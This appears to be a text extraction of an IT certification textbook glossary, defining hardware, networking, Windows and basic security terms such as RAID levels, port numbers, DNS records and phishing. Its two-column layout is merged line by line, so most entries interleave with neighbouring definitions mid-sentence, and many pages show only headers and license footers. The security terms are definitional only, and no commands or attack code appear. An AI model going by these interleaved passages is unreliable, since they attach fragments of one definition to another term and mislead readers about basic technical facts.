application programming interface
802.3 Ethernet Standards developed as (API) Library of programming utilities
the IEEE 802.3 series describing media used, for example, to enable software
types, access methods, data rates, and developers to access functions of the
distance limitations at OSI layers 1 and 2 TCP/IP network stack under a particular
using xBASE-y designations. operating system.
access point (AP) Device that provides application virtualization Software
a connection between wireless devices delivery model where the code runs on
and can connect to wired networks, a server and is streamed to a client.
implementing an infrastructure mode
authentication, authorization, and
WLAN.
accounting (AAA) Security concept
adapter cable Peripheral cable where a centralized platform verifies
converting between connector form subject identification, ensures the
factors or between signaling types, such subject is assigned relevant permissions,
as DisplayPort to HDMI. and then logs these actions to create an
audit trail.
Advanced Micro Devices (AMD)
CPU manufacturer providing healthy automatic document feeder (ADF)
competition for Intel. AMD chips such Device that feeds media automatically
as the K6 or Athlon 64 and latterly the into a scanner or printer.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
2 | Glossary
Glossary
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Glossary | 3
Glossary
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
4 | Glossary
Glossary
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Glossary | 5
Glossary
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
6 | Glossary
individual host by filtering packets to an with a magnetic coating that are spun
access control list. under disk heads that can read and
write to locations on each platter
firmware Software instructions
(sectors).
embedded on a hardware device such
as a computer motherboard. Modern hardware security module (HSM) An
types of firmware are stored in flash appliance for generating and storing
memory and can be updated more cryptographic keys. This sort of solution
easily than legacy programmable read- may be less susceptible to tampering
only memory (ROM) types. and insider threats than software-based
storage.
flash drive Solid state flash memory
provisioned as a peripheral device with header (motherboard) Connector on
a USB interface. the motherboard for internal cabling,
such as fan power and front panel ports
flatbed scanner Type of scanner where
and buttons.
the object is placed on a glass faceplate
and the scan head moves underneath it. headset Peripheral device supporting
audio input (microphone) and output
form factor Size and shape of
(speaker headphones).
a component, determining its
compatibility. Form factor is most heat sink Cooling device fitted to PC
closely associated with PC motherboard, components to optimize heat transfer.
case, and power supply designs.
high availability (HA) Metric that
frequency band Portion of the defines how closely systems approach
microwave radio-frequency spectrum in the goal of providing data availability
which wireless products operate, such 100% of the time while maintaining a
as 2.4 GHz band or 5 GHz band. high level of system performance.
F-type connector Screw down High-Definition Multimedia Interface
connector used with coaxial cable. (HDMI) Digital audio/video interface
developed for use on both consumer
fully qualified domain name (FQDN)
electronics and computer equipment.
Unique label specified in a DNS
hierarchy to identify a particular host hostname A human-readable name
within a subdomain within a top-level that identifies a network host.
domain.
hotspot Using the cellular data plan
fuser Assembly in a laser print device of a mobile device to provide Internet
that fixes toner to media. This is typically access to a laptop or PC. The PC can
a combination of a heat and pressure be tethered to the mobile by USB,
roller. Bluetooth, or Wi-Fi (a mobile hotspot).
Global Positioning System (GPS) hub Layer 1 (Physical) network device
Means of determining a receiver’s used to implement a star network
position on Earth based on information topology on legacy Ethernet networks,
received from orbital satellites. working as a multiport repeater.
Global System for Mobile hybrid cloud Cloud deployment that
Communication (GSM) Standard for uses both private and public elements.
cellular radio communications and data
HyperText Transfer Protocol/HTTP
transfer. GSM phones use a SIM card
Secure Application protocol used to
to identify the subscriber and network
provide web content to browsers. HTTP
provider. 4G and later data standards
uses port 80. HTTPS(ecure) provides
are developed for GSM.
for encrypted transfers, using TLS and
Google Workspace Mobile/cloud port 443.
computing office productivity and data
iCloud Mobile/cloud computing
storage suite operated by Google.
office-productivity and data-storage
hard disk drive (HDD) Mass storage suite operated by Apple and closely
device that uses mechanical platters integrated with macOS and iOS.
Glossary
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Glossary | 7
Glossary
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
8 | Glossary
Glossary
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Glossary | 9
maintenance kit On a laser printer, the mSATA Connector form factor for
fuser unit (the part that fuses toner onto internal solid state drives.
the paper) needs replacing according
multicore CPU design that puts two
to the maintenance kit schedule. A
chips onto the same package. Most
maintenance kit also includes new
CPUs are multicore (more than two
pickup, feed, and separation rollers. It
cores).
may also include transfer components
(roller or belt), or these may be replaced multimode fiber (MMF) Fiber optic
on a different schedule, depending on cable type using LED or vertical cavity
the printer model. surface emitting laser optics and graded
using optical multimode types for core
managed switch Ethernet switch that
size and bandwidth.
is configurable via a command-line
interface or SDN controller. multiple input multiple output
(MIMO) Use of multiple reception and
mass storage Device with a persistent
transmission antennas to boost wireless
storage mechanism, such as hard drives,
bandwidth via spatial multiplexing and
solid state drives, and optical drives.
to boost range and signal reliability via
media access control (MAC) Hardware spatial diversity.
address that uniquely identifies each
multisocket Motherboard configuration
network interface at layer 2 (Data
with multiple CPU sockets. The CPUs
Link). A MAC address is 48 bits long
installed must be identical.
with the first half representing the
manufacturer’s organizationally unique multithreading CPU architecture that
identifier (OUI). exposes two or more logical processors
to the OS, delivering performance
memory card Solid state flash memory
benefits similar to multicore and
provisioned as a peripheral device in a
multisocket to threaded applications.
proprietary adapter card form factors,
such as Secure Digital and microSD. multiuser MIMO (MU-MIMO) Use of
spatial multiplexing to allow a wireless
metered utilization Feature of cloud
access point to support multiple client
service models that allows customers
stations simultaneously.
to track and pay for precise compute,
storage, and network resource units. MX record Type of DNS resource record
used to identify the email servers used
metropolitan area network (MAN)
by a domain.
Network scope covers the area of a city
(that is, no more than tens of kilometers). near-field communication
(NFC) Standard for two-way radio
Microsoft 365 Mobile/cloud computing
communications over very short
office productivity and data storage
(around four inches) distances,
suite operated by Microsoft.
facilitating contactless payment and
mobile application management similar technologies. NFC is based on
(MAM) Enterprise management function RFID.
that enables control over apps and
NetBIOS Session management protocol
storage for mobile devices and other
used to provide name registration and
endpoints.
resolution services on legacy Microsoft
mobile device management (MDM) networks.
Process and supporting technologies for
network address translation (NAT)
tracking, controlling, and securing the
Routing mechanism that conceals
organization’s mobile infrastructure.
internal addressing schemes from the
modular power supply PSU design public Internet by translating between
where power cables can be attached to a single public address on the external
ports on the unit as needed. side of a router and private, non-
routable addresses internally.
Molex connector Legacy power
connector for internal devices such as network attached storage (NAS)
hard drives and optical drives. Storage device enclosure with network
Glossary
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
10 | Glossary
port and an embedded OS that supports use to create an image on the page
typical network file access protocols (FTP (for most printers, this means a raster
and SMB for instance). describing the placement of dots on the
paper).
network interface card (NIC) Adapter
card that provides one or more Ethernet pairing Feature of Bluetooth that
ports for connecting hosts to a network establishes connectivity between two
so that they can exchange data over a devices, often by entering a PIN.
link.
patch cord Type of flexible network
network mask Number of bits applied cable typically terminated with RJ45
to an IP address to mask the network connectors. Ethernet patch cords cannot
ID portion from the host/interface ID be longer than five meters.
portion.
patch panel Type of distribution frame
non-volatile memory express (NVMe) used with twisted pair cabling with
Internal interface for connecting flash IDCs to terminate fixed cabling on one
memory devices, such as SSDs, directly side and modular jacks to make cross-
to a PCI Express bus. NVMe allows much connections to other equipment on the
higher transfer rates than SATA/AHCI. other.
operational technology (OT) PCI Express (PCIe) Internal expansion
Communications network designed to bus that uses serial point-to-point
implement an industrial control system communications between devices. Each
rather than data networking. link can comprise one or more lanes
(x1, x2, x4, x8, x12, x16, or x32). Each
optical character recognition (OCR)
lane supports a full-duplex transfer
Software that can identify the shapes of
rate of 500 MB/s (v1.0) up to about
characters and digits to convert them
4 GB/s (v5.0).
from printed images to electronic data
files that can be modified in a word- peripheral component interconnect
processing program. (PCI) Legacy internal expansion bus
supporting 32-bit parallel transfers
optical drive Mass storage device
working at 33 MHz.
that supports CD, DVD, and/or Blu-ray
media. Burner-type drives also support permanent cable Type of solid network
recording and rewriting. cable typically terminated to punchdown
blocks that is run through wall and
optical network terminal (ONT) Device
ceiling spaces.
that converts between optical and
electrical signaling deployed to facilitate personal area network (PAN)
full fiber Internet connection types. Network scope that uses close-range
wireless technologies (usually based
organic LED (OLED) Type of flat panel
on Bluetooth or NFC) to establish
display where each pixel is implemented
communications between personal
as an LED, removing the need for a
devices, such as smartphones, laptops,
separate backlight.
and printers/peripheral devices.
orthogonal frequency division
pickup rollers Print device components
multiple access (OFDMA) Feature of
that feed paper between the input tray,
Wi-Fi 6 allowing an access point to serve
print engine, and output tray.
multiple client stations simultaneously.
pin grid array (PGA) CPU socket form
output voltage Direct current (DC)
factor used predominantly by AMD
3.3 VDC, 5 VDC, and 12 VDC power
where connector pins are located on the
supplied over PSU cables to computer
CPU package.
components.
plain old telephone system (POTS)
P1 connector Main power connector
Parts of a telephone network “local loop”
from the PSU to the motherboard.
that use voice-grade cabling. Analog
page description language (PDL) data transfer over POTS using dial-up
Instructions that the print device can modems is slow (33.3 Kb/s).
Glossary
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Glossary | 11
Glossary
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
12 | Glossary
public cloud (multitenant) Cloud that data and program instructions while the
is deployed for shared use by multiple computer is turned on.
independent tenants.
real-time clock (RTC) Part of the
public IP address Some IP address system chipset that keeps track of the
ranges are designated for use on date and time. The RTC is powered by
private networks only. Packets with a battery, so the PC keeps track of the
source IP addresses in public ranges time even when it is powered down. If
are permitted to be forwarded over the computer starts losing time, it is a
the Internet. Packets with source IP sign that the battery is failing.
addresses from private ranges should
received signal strength indicator
be blocked at Internet gateways
(RSSI) Signal strength as measured at
or forwarded using some type of
the receiver, using either decibel units
translation mechanism.
or an index value.
public switched telephone network
redundant array of independent/
(PSTN) Global network connecting
inexpensive disks (RAID) Specifications
national telecommunications systems.
that support redundancy and fault
punchdown tool Tool used to terminate tolerance for different configurations of
solid twisted-pair copper cable to an multiple-device storage systems.
insulation displacement connector
redundant power supply System case
block.
configuration supporting two power
quadruple-channel System-memory units for fault tolerance.
controller configuration that provides
registered-jack connector (RJ) Series
four data pathways between the memory
of jack/plug types used with twisted-pair
modules and a compatible CPU.
cabling, such as RJ45 and RJ11.
quality of service (QoS) Systems that
Remote Authentication Dial-in
differentiate data passing over the
User Service (RADIUS) AAA protocol
network that can reserve bandwidth for
used to manage remote and wireless
particular applications. A system that
authentication infrastructures.
cannot guarantee a level of available
bandwidth is often described as Class of Remote Desktop Protocol (RDP)
Service (CoS). Application protocol for operating
remote connections to a host using a
radio-frequency ID (RFID) Means of
graphical interface. The protocol sends
encoding information into passive tags,
screen data from the remote host to
which can be energized and read by
the client and transfers mouse and
radio waves from a reader device.
keyboard input from the client to the
RAID0 Striping drive configuration that remote host. It uses TCP port 3389.
provides no redundancy against device
reservation (DHCP) DHCP configuration
failure.
that assigns either a prereserved or
RAID1 Mirrored two-disk redundant persistent IP address to a given host,
drive configuration with 50% capacity based on its hardware address or
utilization. other ID.
RAID10 Stripe of mirrored four-disk resin 3-D print device media type.
redundant drive configuration with 50%
resource record Data file storing
capacity utilization. A RAID10 volume
information about a DNS zone. The main
can support the loss of one device in
records are as follows: A (maps a host
each mirror.
name to an IPv4 address), AAAA (maps to
RAID5 Striping with parity-redundant an IPv6 address), CNAME (an alias for a
drive configuration supporting a flexible host name), MX (the IP address of a mail
number of devices and better than 50% server), and PTR (allows a host name to be
capacity utilization. identified from an IP address).
random-access memory (RAM) Volatile router Intermediate system working at
storage devices that hold computer the Network layer capable of forwarding
Glossary
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Glossary | 13
packets around logical networks of with the print device using a PIN or
different layer 1 and layer 2 types. smart badge.
sandbox Computing environment self-monitoring analysis and reporting
that is isolated from a host system technology (SMART) Technology
to guarantee that the environment designed to alert the user to an error
runs in a controlled, secure fashion. condition in a mass-storage device before
Communication links between the the disk becomes unusable.
sandbox and the host are usually
Sender Policy Framework (SPF) DNS
completely prohibited so that malware
record identifying hosts authorized to
or faulty software can be analyzed in
send mail for the domain.
isolation and without risk to the host.
separation pad Print device component
Satellite System of microwave
that ensures only a single sheet at a
transmissions where orbital satellites
time is fed into the paper path.
relay signals between terrestrial receivers
or other orbital satellites. Satellite serial ATA (SATA) Serial ATA is the most
internet connectivity is enabled through a widely used interface for hard disks
reception antenna connected to the PC or on desktop and laptop computers. It
network through a DVB-S modem. uses a 7-pin data connector with one
device per port. There are three SATA
scalability Property by which a
standards specifying bandwidths of
computing environment is able to
1.5 Gb/s, 3 Gb/s, and 6 Gb/s respectively.
gracefully fulfill its ever-increasing
SATA drives also use a new 15-pin
resource needs.
power connector, though adapters for
scan to cloud Feature of scanners and the old style 4-pin Molex connectors
multifunction devices that directs output are available. External drives are also
to a cloud storage account. supported via the eSATA interface.
scan to email Using an SMTP server serial cable (RS-232) Legacy bus type
(and possibly an LDAP server to look up using low bandwidth asynchronous
recipients) to send a scanned job to a serial transmission (RS-232).
mail recipient directly.
Server Message Block (SMB)
scan to folder Using Windows Application protocol used for requesting
Networking (SMB) to output a scanned files from Windows servers and
job directly to a shared folder on the delivering them to clients. SMB allows
network. machines to share files and printers,
thus making them available for other
scanner Type of copier that can convert
machines to use. SMB client software
the image of a physical object into
is available for UNIX-based systems.
an electronic data file. The two main
Samba software allows UNIX and Linux
components of a scanner are the lamp,
servers or NAS appliances to run SMB
which illuminates the object, and the
services for Windows clients.
recording device, an array of charge
coupled devices (CCDs). service set identifier (SSID) Character
string that identifies a particular wireless
scope (DHCP) Range of consecutive IP
LAN (WLAN).
addresses in the same subnet that a
DHCP server can lease to clients. shielded twisted pair (STP) Copper
twisted-pair cabling with screening and
secure boot Feature of UEFI that
shielding elements for individual wire
prevents unauthorized processes from
pairs and/or the whole cable to reduce
executing during the boot operation.
interference.
Secure Shell (SSH) Application protocol
signal-to-noise ratio (SNR)
supporting secure tunneling and remote
Measurement of a wireless signal level
terminal emulation and file copy. SSH
in relation to any background noise.
runs over TCP port 22.
Simple Mail Transfer Protocol (SMTP)
secured print Feature that holds print
Application protocol used to send
jobs until the user authenticates directly
Glossary
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
14 | Glossary
mail between hosts on the Internet. cards. Commonly, audio ports may
Messages are sent between servers over be marked as: audio out, audio in,
TCP port 25 or submitted by a mail client speaker out, microphone input/mic, and
over secure port TCP/587. headphones.
Simple Network Management spam Junk, fraudulent, and malicious
Protocol (SNMP) Application protocol messaging sent over email (or instant
used for monitoring and managing messaging, which is called spim). Spam
network devices. SNMP works over UDP can also be spread via social networking.
ports 161 and 162 by default.
spool Generic term describing how a
single-channel System-memory print output stream is passed from a
controller configuration that provides client application and stored temporarily
one data pathway between the memory at a print server until the print monitor
modules and the CPU. can route the job to the print device.
single-mode fiber (SMF) Fiber optic storage area network (SAN) Network
cable type that uses laser diodes and dedicated to provisioning storage
narrow core construction to support resources, typically consisting of storage
high bandwidths over distances of more devices and servers connected to
than five kilometers. switches via host bus adapters.
small computer systems interface straight-tip connector (ST) Bayonet-
(SCSI) Legacy expansion bus standard style twist-and-lock connector for fiber
allowing for the connection of internal optic cabling.
and external devices. Each device on
subscriber connector (SC) Push/pull
a SCSI bus must be allocated a unique
connector used with fiber optic cabling.
ID. The bus must also be terminated at
both ends. supervisory control and data
acquisition (SCADA) Type of industrial
small office, home office (SOHO)
control system that manages large-scale,
Category of network type and products
multiple-site devices and equipment
that are used to implement small-
spread over geographically large areas
scale LANs and off-the-shelf Internet
from a host computer.
connection types.
switch Intermediate system used to
smart device Device or appliance (such
establish contention-free network
as a TV, refrigerator, thermostat, video
segments at OSI layer 2 (Data Link). An
entry phone, or lightbulb) that can be
unmanaged switch does not support
configured and monitored over an IoT
any sort of configuration.
network.
switched port analyzer (SPAN)
SODIMM System-memory form factor
Copying ingress and/or egress
designed for use in laptops.
communications from one or more
software as a service (SaaS) Cloud switch ports to another port. This is
service model that provisions fully used to monitor communications
developed application services to users. passing over the switch.
software-defined networking (SDN) syslog Application protocol and event-
APIs and compatible hardware/virtual logging format enabling different
appliances allowing for programmable appliances and software applications
network appliances and systems. to transmit logs or event records to a
central server. Syslog works over UDP
solid state drive (SSD) Persistent mass-
port 514 by default.
storage device implemented using flash
memory. T568A/T568B Twisted-pair termination
pinouts defined in the ANSI/TIA/
sound card Adapter card providing
EIA 568 Commercial Building
sound playback and recording
Telecommunications Standards.
functionality. A number of different
audio ports exist on modern computer telnet Application protocol supporting
motherboards or on specialist sound unsecure terminal emulation for remote
Glossary
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Glossary | 15
host management. Telnet runs over TCP often dedicated to use with digital art
port 23. applications.
test access port (TAP) Hardware device transfer roller/belt Roller, corona
inserted into a cable run to copy frames wire, or belt assembly on a laser print
for analysis. device that applies a charge to the
media (paper) so that it attracts toner
thermal paste/pad Cooling substance
from the photoconductor. A detac strip
applied between a component and heat
then removes the charge to prevent
sink to optimize heat transfer.
paper curl. On a color laser printer, the
thermal printer Type of printer that transfer unit is usually a belt.
uses a heated print head and specially
Transmission Control Protocol (TCP)
treated paper to form the image. Most
Protocol in the TCP/IP suite operating
direct thermal printers are handheld
at the transport layer to provide
devices used for printing labels or
connection-oriented, guaranteed
receipts.
delivery of packets.
thin film transistor (TFT) Specific
Transmission Control Protocol/
display technology used to implement
Internet Protocol (TCP/IP) Network
modern flat-panel LCD displays.
protocol suite used to implement the
Thunderbolt Thunderbolt can be used Internet and most WANs and LANs. It
as a display interface (like DisplayPort) uses a four-layer network model that
and as a general peripheral interface corresponds roughly to the OSI model
(like USB 3). The latest version uses as follows: Network Interface (Physical/
USB-C connectors. Data Link), Internet (Network), Transport
(Transport), Application (Session,
tone generator Two-part tool used to
Presentation, Application).
identify one cable within a bundle by
applying an audible signal. Transport Layer Security (TLS)
Security protocol that uses certificates
toner Specially formulated compound
for authentication and encryption to
to impart dye to paper through an
protect web communications and other
electrographic process (used by
application protocols.
laser printers and photocopiers).
The key properties of toner are triple-channel System-memory
the colorant (dye), ability to fuse controller configuration that provides
(wax or plastic), and ability to hold three data pathways between the
a charge. There are three main memory modules and a compatible
types of toner, distinguished by the CPU.
mechanism of applying the toner to
Trivial File Transfer Protocol (TFTP)
the developer roller: dual component
Simplified form of FTP supporting only
(where the toner is mixed with a
file copying. TFTP works over UDP
separate magnetic developer), mono-
port 69.
component (where the toner itself
is magnetic), and non-magnetic troubleshooting methodology
mono-component (where the toner is Structured approach to problem-solving
transferred using static properties). using identification, theory of cause,
testing, planning, implementation,
touch pen Input device that can be used
verification, and documentation steps.
with a compatible digitizer/track pad/
drawing tablet for natural input, such as trusted platform module (TPM)
handwriting and sketching. Specification for secure hardware-
based storage of encryption keys,
touch screen A display screen
hashed passwords, and other user- and
combined with a digitizer that is
platform-identification information.
responsive to touch input.
twisted nematic (TN) Type of low-cost
trackpad Sometimes synonymous with
TFT display with relatively poor viewing
touch pad, but also a touch interface
angles and contrast ratio, but good
provisioned as a peripheral device,
response times.
Glossary
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
16 | Glossary
twisted pair cable Network cable 480 Mb/s and is backward compatible
construction with insulated copper with 1.1 devices (which run at the
wires twisted about each other. A pair of slower speed). USB devices are hot
color-coded wires transmits a balanced swappable. A device can draw up to
electrical signal. The twisting of the wire 2.5 W power. USB 3.0 and 3.1 define
pairs at different rates acts to reduce 5 Gb/s (SuperSpeed) and 10 Gb/s
interference and crosstalk. (SuperSpeed+) rates and can deliver
4.5 W power.
two-factor authentication (2FA)
Strong authentication mechanism that unshielded twisted pair Media type
requires a user to submit two different that uses copper conductors arranged
types of credential, such as a fingerprint in pairs that are twisted to reduce
scan plus PIN. Often, the second interference. Typically, cables are 4-pair
credential is transmitted via a second or 2-pair.
trusted device or account. This is also
USB permission Feature of system
referred to as 2-step verification.
setup allowing USB ports to be disabled.
TXT record DNS resource record for
User Datagram Protocol (UDP)
storing free-form string values.
Protocol in the TCP/IP suite operating
unboxing Operational procedure for at the transport layer to provide
ensuring that a new device is installed connectionless, non-guaranteed
safely to an optimum environment. communication.
unified extensible firmware interface vertical alignment (VA) Type of TFT
(UEFI) Type of system firmware display with good viewing angles and
providing support for 64-bit CPU excellent contrast ratio.
operation at boot, full GUI and mouse
video card Adapter that handles
operation at boot, and better boot
graphics processing and output to a
security.
display device over one or more video
unified threat management (UTM) interface ports.
All-in-one security appliances and
video graphics array (VGA) Legacy
agents that combine the functions of
video interface supporting analog-
a firewall, malware scanner, intrusion
only signaling over a 15-pin D-shell
detection, vulnerability scanner, data-
connector.
loss prevention, content filtering, and
so on. virtual desktop infrastructure (VDI)
A virtualization implementation that
uniform resource locator (URL)
separates the personal computing
Application-level addressing scheme for
environment from a user’s physical
TCP/IP, allowing for human-readable
computer.
resource addressing. For example:
protocol://server/file, where “protocol” is virtual local area network (VLAN)
the type of resource (HTTP, FTP), “server” Logical network segment comprising a
is the name of the computer (www. broadcast domain established using a
microsoft.com), and “file” is the name of feature of managed switches to assign
the resource you wish to access. each port a VLAN ID. Even though
hosts on two VLANs may be physically
universal asynchronous receiver
connected to the same switch, local
transmitter (UART) Controller that
traffic is isolated to each VLAN, so they
can send and receive data in an
must use a router to communicate.
asynchronous serial format.
virtual machine (VM) Guest operating
Universal Serial Bus (USB) USB is
system installed on a host computer
the main type of connection interface
using virtualization software (a
used on PCs. A larger Type A connector
hypervisor).
attaches to a port on the host; Type B
and Mini- or Micro-Type B connectors virtual machine escaping (VM
are used for devices. USB 1.1 supports escaping) Attack against a virtualization
12 Mb/s, while USB 2.0 supports platform where malware running in a
Glossary
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Glossary | 17
VM is able to interact directly with the such as signal strength and channel
hypervisor or host kernel. utilization.
virtual machine sprawl (VM sprawl) Wireless Internet Service Provider
Configuration vulnerability where (WISP) ISP offering Internet access
provisioning and deprovisioning over ground-based Line of Sight (LoS)
of virtual assets are not properly microwave transmitters.
authorized and monitored.
wireless local area network (WLAN)
virtual private network (VPN) Secure Network scope and type that uses
tunnel created between two endpoints wireless radio communications based
connected via an unsecure transport on some variant of the 802.11 (Wi-Fi)
network (typically the Internet). standard series.
virtual RAM An OS mediates access to
random-access memory (RAM) devices Core 2
by assigning a virtual address space
to each process. As well as protecting 2-step verification Authentication
memory access, the memory capacity mechanism that uses a separate
can be extended by configuring a swap channel to authorize a sign-on attempt
space or pagefile on a mass-storage or to transmit an additional credential.
device (HDD or SSD). This can use a registered email account
or a contact phone number for an SMS
virtualization Computing environment or voice call.
where multiple independent
operating systems can be installed to 3-2-1 backup rule Best practice maxim
a single hardware platform and run stating that at any given time there
simultaneously. should be at least three copies of data
stored on two media types, with one
virtualization support CPU extensions copy held off site.
to allow better performance when a
host runs multiple guest operating 32-bit versus 64-bit Processing modes
systems or VMs. referring to the size of each instruction
processed by the CPU. 32-bit CPUs
Voice over Internet Protocol (VoIP) replaced earlier 16-bit CPUs and were
Generic name for protocols that carry used through the 1990s to the present
voice traffic over data networks. day, though most PC and laptop CPUs
wattage rating Measure of how much now work in 64-bit mode. The main 64 bit
power can be supplied by a PSU. platform is called AMD64 or EM64T
(by Intel). Software can be compiled as
webcam Type of digital camera used 32-bit or 64-bit. 64-bit CPUs can run most
to stream and record video. There are 32-bit software, but a 32 bit CPU cannot
many types, from devices built into execute 64-bit software.
laptops to standalone units. While
early devices were only capable of low 802.1X Standard for encapsulating EAP
resolutions, most webcams are now communications over a LAN (EAPoL) or
HD-capable. WLAN (EAPoW) to implement port-based
authentication.
wide area network (WAN) Network
scope that spans a large geographical acceptable use policy (AUP) Policy that
area, incorporating more than one site governs employees’ use of company
and often a mix of different media types equipment and Internet services. ISPs
and protocols plus the use of public may also apply AUPs to their customers.
telecommunications networks. access control list (ACL) Collection
Wi-Fi Brand name for the IEEE of access control entries (ACEs) that
802.11 standards that can be used to determines which subjects (user
implement a wireless local area network accounts, host IP addresses, and so
(WLAN). on) are allowed or denied access to the
object and the privileges given (read-
Wi-Fi analyzer Device or software that only, read/write, and so on).
can report characteristics of a WLAN,
Glossary
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
18 | Glossary
Glossary
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Glossary | 19
Glossary
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
20 | Glossary
Glossary
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Glossary | 21
Glossary
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
22 | Glossary
Glossary
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Glossary | 23
Glossary
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
24 | Glossary
Glossary
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Glossary | 25
reduces the chance of collisions, where since the last full or incremental backup
two different inputs produce the same (whichever was most recent) are
output. backed up.
hibernate Power-saving state where the indexing options Control Panel
contents of memory are saved to hard app related to search database
disk (hiberfil.sys) and the computer is maintenance.
powered off. Restarting the computer
inheritance File system access-
restores the desktop.
control-concept where child objects
hive File storing configuration data are automatically assigned the same
corresponding to a section of the permissions as their parent object.
Windows registry.
in-place upgrade OS installation
home folder Default local or network method where the setup program is
folder for users to save data files to. launched from an existing OS. This can
typically retain user data files, settings,
home router SOHO device providing
and third-party apps.
Internet routing via a full fiber, DSL,
cable, or satellite link. These appliances insider threat Type of threat actor who
also provide a 4-port LAN switch and is assigned privileges on the system and
Wi-Fi plus a firewall. causes an intentional or unintentional
incident.
iCloud Mobile/cloud computing
office-productivity and data-storage instant search Windows feature
suite operated by Apple and closely allowing rapid search of apps, data
integrated with macOS and iOS. folders, messages, and the web.
ifconfig command Deprecated instant secure erase (ISE) Media
Linux command tool used to gather sanitization command built into HDDs
information about the IP configuration and SSDs that are self-encrypting that
of the network adapter or to configure works by erasing the encryption key,
the network adapter. leaving remnants unrecoverable.
image deployment Deployment Internet of Things (IoT) Devices that
method where the target disk is written can report state and configuration
with an image of the new OS. data and be remotely managed over IP
networks.
impact to business/operation/
network/device Considerations that Internet Options Control Panel applet
should be made when planning the allowing configuration of the Internet
installation or upgrade of new apps. Explorer web browser.
impersonation Social engineering Internet Protocol address (IP)
attack where an attacker pretends to be Format for logical host and network
someone he or she is not. addressing. In IPv4, a 32-bit binary
address is expressed in dotted decimal
implicit deny Basic principle of security
notation, such as 192.168.1.1. In IPv6,
stating that unless something has
addresses are 128-bit expressed
explicitly been granted access, it should
as hexadecimal (for example,
be denied access.
2001:db8::0bcd:abcd:ef12:1234).
incident response plan (IRP)
iOS OS for Apple’s iPhone smartphone
Procedures and guidelines covering
and most iPad tablet models.
appropriate priorities, actions, and
responsibilities in the event of security ip command Linux command tool
incidents, divided into preparation, used to gather information about
detection/analysis, containment, the IP configuration of the network
eradication/recovery, and post-incident adapter or to configure the network
stages. adapter.
incremental backup Job type in which iPadOS OS for some models of the
all selected files that have changed Apple iPad tablet.
Glossary
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
26 | Glossary
Glossary
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Glossary | 27
Glossary
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
28 | Glossary
on site versus off site Media rotation the user to input a join-the-dots pattern
scheme that ensures at least one copy to unlock the device.
of data is held at a different location
performance monitor (perfmon.msc)
to mitigate the risk of a disaster that
Console for reporting and recording
destroys all storage at a single site.
resource utilization via counter data for
OneDrive Cloud storage service object instances.
operated by Microsoft and closely
personal government-issued
integrated with Windows.
information Data related to identity
on-path attack Attack where the threat documents issued by governments,
actor makes an independent connection such as passports, social security IDs,
between two victims and is able to read and driving licenses, that is liable to be
and possibly modify traffic. subject to strict legal and regulatory
compliance requirements.
open-source Licensing model that
grants permissive rights to end-users, personal identification number
such as to install, use, modify, and (PIN) Number used in conjunction with
distribute a software product and its authentication devices such as smart
source code, as long as redistribution cards; as the PIN should be known
permits the same rights. only to the user, loss of the smart card
should not represent a security risk.
operator Programming object that can
resolve the truth value of a condition, personalization settings Windows
such as whether one variable is equal to Settings pages related to customizing
another. the appearance of the desktop using
themes.
organizational unit (OU) Structural
feature of a network directory that can personally identifiable information
be used to group objects that should (PII) Data that can be used to identify
share a common configuration or or contact an individual (or in the case
organizing principle, such as accounts of identity theft, to impersonate him
within the same business department. or her).
original equipment manufacturer phishing Email-based social engineering
(OEM) In PC terms, companies that sell attack, in which the attacker sends email
Windows co-branded under their own from a supposedly reputable source,
logo. OEM Windows licenses are valid such as a bank, to try to elicit private
only on the system that the software information from the victim.
was installed on, and the OEM must
phone settings Windows Settings
provide support.
pages for associating a smartphone with
palmprint scanner Biometric camera- Windows.
based scanner that uses unique features
physical destruction Using drilling,
of a palm shown by visible and infrared
shredding, incineration, or degaussing
light.
of storage media before recycling or
password attack Any attack where repurposing to minimize the risk of
the attacker tries to gain unauthorized leaving persistent data remnants.
access to and use of passwords.
physical placement Considerations for
password manager Software that can installation location for PC and network
suggest and store site and app passwords devices to ensure reliable and secure
to reduce risks from poor user choices operation.
and behavior. Most browsers have a
piggybacking Allowing a threat actor
built-in password manager.
to enter a site or controlled location
pathping command Windows utility without authorization.
for measuring latency and packet loss
PIN code lock Basic mobile-device
across an internetwork.
authentication mechanism that requires
pattern lock Mobile-device the correct number or passcode to
authentication mechanism that requires unlock the device.
Glossary
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Glossary | 29
Glossary
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
30 | Glossary
Glossary
